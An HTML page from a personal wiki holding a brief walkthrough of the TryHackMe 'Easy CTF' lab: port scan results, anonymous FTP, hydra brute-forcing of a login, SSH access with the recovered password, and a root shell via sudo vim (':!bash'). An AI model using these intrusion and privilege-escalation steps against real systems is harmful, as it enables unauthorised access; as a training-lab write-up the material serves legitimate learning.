<!DOCTYPE html>
<html class="writer-html5" lang="en" >
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
      <link rel="shortcut icon" href="../../img/favicon.ico" />
    <title>THM Easy CTF - My Portfolio Wiki</title>
    <link rel="stylesheet" href="../../css/theme.css" />
    <link rel="stylesheet" href="../../css/theme_extra.css" />
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/github.min.css" />
    
      <script>
        // Current page data
        var mkdocs_page_name = "THM Easy CTF";
        var mkdocs_page_input_path = "markdown\\THM Easy CTF.md";
        var mkdocs_page_url = null;
      </script>
    
    <!--[if lt IE 9]>
      <script src="../../js/html5shiv.min.js"></script>
    <![endif]-->
      <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/highlight.min.js"></script>
      <script>hljs.highlightAll();</script> 
</head>

<body class="wy-body-for-nav" role="document">

  <div class="wy-grid-for-nav">
    <nav data-toggle="wy-nav-shift" class="wy-nav-side stickynav">
    <div class="wy-side-scroll">
      <div class="wy-side-nav-search">
          <a href="../.." class="icon icon-home"> My Portfolio Wiki
        </a><div role="search">
  <form id ="rtd-search-form" class="wy-form" action="../../search.html" method="get">
      <input type="text" name="q" placeholder="Search docs" aria-label="Search docs" title="Type search term here" />
  </form>
</div>
      </div>

      <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="Navigation menu">
              <ul>
                <li class="toctree-l1"><a class="reference internal" href="../..">Home</a>
                </li>
              </ul>
              <p class="caption"><span class="caption-text">Coding Language</span></p>
              <ul>
                  <li class="toctree-l1"><a class="reference internal" href="../../python/">Python</a>
                  </li>
                  <li class="toctree-l1"><a class="reference internal" href="../../bash/">Bash</a>
                  </li>
                  <li class="toctree-l1"><a class="reference internal" href="../">Markdown</a>
                  </li>
              </ul>
      </div>
    </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">
      <nav class="wy-nav-top" role="navigation" aria-label="Mobile navigation menu">
          <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
          <a href="../..">My Portfolio Wiki</a>
        
      </nav>
      <div class="wy-nav-content">
        <div class="rst-content"><div role="navigation" aria-label="breadcrumbs navigation">
  <ul class="wy-breadcrumbs">
    <li><a href="../.." class="icon icon-home" aria-label="Docs"></a></li>
      <li class="breadcrumb-item active">THM Easy CTF</li>
    <li class="wy-breadcrumbs-aside">
    </li>
  </ul>
  <hr/>
</div>
          <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
            <div class="section" itemprop="articleBody">
              
                <h2 id="thm-easy-ctf">THM Easy CTF</h2>
<h3 id="recon">recon</h3>
<p>Target IP: <code>10.10.54.244</code></p>
<pre><code>PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
2222/tcp open  EtherNetIP-1 (ssh) SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 exploit
</code></pre>
<h3 id="path-to-root-priveldge">Path to root priveldge</h3>
<p>ftp into port 21 
    login: anonymous</p>
<p>download: get Formitch.txt</p>
<p>feroxbuster: http port 80</p>
<pre><code>find login page with php.login
</code></pre>
<p>brute force login page with hydra using:
    username: mitch 
    password list: seclists top 100 or more passwords</p>
<p>username: mitch
password: secret</p>
<p>ssh into box on port 2222 with mitch as user
ssh -p 2222 mitch@<ip>
login with password above.</p>
<p>Next we need to see what sudo priveledges the user mitch might have
<code>sudo -l</code></p>
<p>we see that we can run vim as root. this tells us we just need to launch a vim and escalate to root by either of these commands:</p>
<ol>
<li><code>sudo vi test.sh</code></li>
</ol>
<p>once inside the vim editor we just need to hit ESC to get to command mode and type out the command to open a root shell
<code>:!bash</code> viola!!! we are in</p>
<ol>
<li>or you could try 
<code>sudo vi -c '!bash'</code> <strong>note</strong> the two looking single quotes in that command are different.</li>
</ol>
              
            </div>
          </div><footer>

  <hr/>

  <div role="contentinfo">
    <!-- Copyright etc -->
  </div>

  Built with <a href="https://www.mkdocs.org/">MkDocs</a> using a <a href="https://github.com/readthedocs/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>.
</footer>
          
        </div>
      </div>

    </section>

  </div>

  <div class="rst-versions" role="note" aria-label="Versions">
  <span class="rst-current-version" data-toggle="rst-current-version">
    
    
    
  </span>
</div>
    <script src="../../js/jquery-3.6.0.min.js"></script>
    <script>var base_url = "../..";</script>
    <script src="../../js/theme_extra.js"></script>
    <script src="../../js/theme.js"></script>
      <script src="../../search/main.js"></script>
    <script>
        jQuery(function () {
            SphinxRtdTheme.Navigation.enable(true);
        });
    </script>

</body>
</html>
